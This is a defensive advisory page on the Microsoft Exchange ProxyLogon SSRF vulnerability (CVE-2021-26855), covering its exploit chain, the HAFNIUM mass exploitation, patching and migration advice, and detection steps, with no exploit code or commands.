NAVANEM
CVE-2021-26855⚡ exploited in the wild

Microsoft Exchange Server, SSRF (ProxyLogon)

Microsoft Exchange Server Remote Code Execution Vulnerability.

Overview

CVE-2021-26855 is a critical pre-authentication Server-Side Request Forgery (SSRF) vulnerability in Microsoft Exchange Server, commonly known as part of the "ProxyLogon" exploit chain. This vulnerability allows an unauthenticated network attacker to send arbitrary HTTP requests through Exchange Server and impersonate any user, including administrators. First disclosed in March 2021, it became the defining on-premises Exchange security catastrophe when the HAFNIUM threat actor (a China-linked state-sponsored group) mass-exploited tens of thousands of Internet-exposed Exchange servers within days.

Technical Details

The vulnerability exists in the static autodiscover and OWA (Outlook Web Access) endpoints of Microsoft Exchange Server. An unauthenticated attacker can exploit the SSRF flaw to forge HTTP requests that Exchange processes as if they originated from any authenticated user.

When chained with three additional vulnerabilities, the attack achieves unauthenticated Remote Code Execution (RCE) as SYSTEM:

  • CVE-2021-26857: Insecure deserialization vulnerability
  • CVE-2021-26858: Post-authentication arbitrary file write
  • CVE-2021-27065: Post-authentication arbitrary file write

The ProxyLogon chain requires no credentials and can be exploited remotely against any Internet-exposed Exchange server.

Impact

The impact of CVE-2021-26855 was catastrophic for organizations running on-premises Exchange:

  • Mass exploitation: After public disclosure on March 2, 2021, automated attacks compromised every vulnerable Internet-exposed Exchange server within days
  • Multiple threat actors: Beyond HAFNIUM, dozens of actors weaponized the chain including ransomware affiliates, cryptocurrency miners, and opportunistic webshell operators
  • Federal response: CISA issued Emergency Directive 21-02 mandating immediate patching across federal civilian agencies
  • MSP devastation: Managed Service Providers spent weeks rebuilding customer mail environments

On-premises Exchange remains a top-three risk in average MSP estates to this day.

Mitigation

  1. Apply patches: Install the March 2021 cumulative update or later immediately on all on-premises Exchange servers
  2. Assume compromise: If any Exchange server was Internet-exposed during March-April 2021 without patching, assume historical compromise, rebuild the server and audit Active Directory for persistence mechanisms
  3. Migration: Consider migrating to Exchange Online where business requirements permit
  4. Network segmentation: Restrict direct Internet access to Exchange servers where possible

Detection

  1. Hunt for HAFNIUM IOCs: Search for China Chopper webshells in expected paths (typically in Exchange directories)
  2. IIS log analysis: Audit IIS logs for historical attack patterns associated with ProxyLogon exploitation
  3. Microsoft tools: Use Microsoft's published detection scripts and IOC lists from MSTIC
  4. Active Directory audit: Review for unauthorized accounts, persistence mechanisms, or privilege escalation that may indicate past compromise